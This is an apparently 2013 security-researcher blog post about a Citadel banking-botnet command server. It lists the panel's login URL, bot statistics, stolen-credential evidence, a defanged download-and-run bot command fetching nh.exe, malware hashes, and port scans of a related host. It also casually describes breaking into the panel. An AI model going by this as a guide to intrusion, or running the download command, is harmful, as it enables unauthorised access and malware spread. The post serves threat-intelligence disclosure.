Sunday, December 29, 2013

Citadel C&C hosted on 173.242.112.135

Doing more work on the botnet command & control servers listed on ZeuS Tracker.

Citadel C&C
173.242.112.135 - VolumeDrive US
Citadel bot v.1.3.5.1
90% of bots located in India.
Evidence of stolen banking credentials.

This server panel is offline now, and its been removed from ZeuS Tracker now, so its ok to publish details about it.


Original ZeuS Tracker page:



Admin panel login:
http://173.242.112.135/office/obi/server/cp.php?m=login



and kick the door down..


Summary:


205 bots
(143 India)


first page of bot details: 
(is that your IP?)


Evidence of stealing credentials.
Facebook.com
ebs.ca-egypt.com (Crédit Agricole Egypt - Online Banking ePayroll System)





Here are some OS statistics to show what systems get infected.
XP, Win7, Win7 x64 and Server 2008 x64

Fun fact:
AntiVirus software is commonly seen running in memory alongside the bot exe.   :-)



Some options:
encryption key: obi





The guy was in the process of updating when I broke in. Oops, sorry about that.



user_execute hxxp://142.0.36.226/office/nh.exe 

(volumedrive again, US PA - get your shit together)

more details on this host later..142.0.36.226

nh.exe - cf2cfc5354b62dc0d9bf42a0a3841437
Virus Total detection 5 of 48

malware phones home to:
185.24.233.5 (Ireland)
but the server has already been seen..https://zeustracker.abuse.ch/monitor.php?host=185.24.233.5

Interesting ports on 185.24.233.5:
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1720/tcp filtered H.323/Q.931
3389/tcp open ms-term-serv

Win2k8 R2 Std
Home base for this h4x0r fucker..more on this detail later.


No comments:

Post a Comment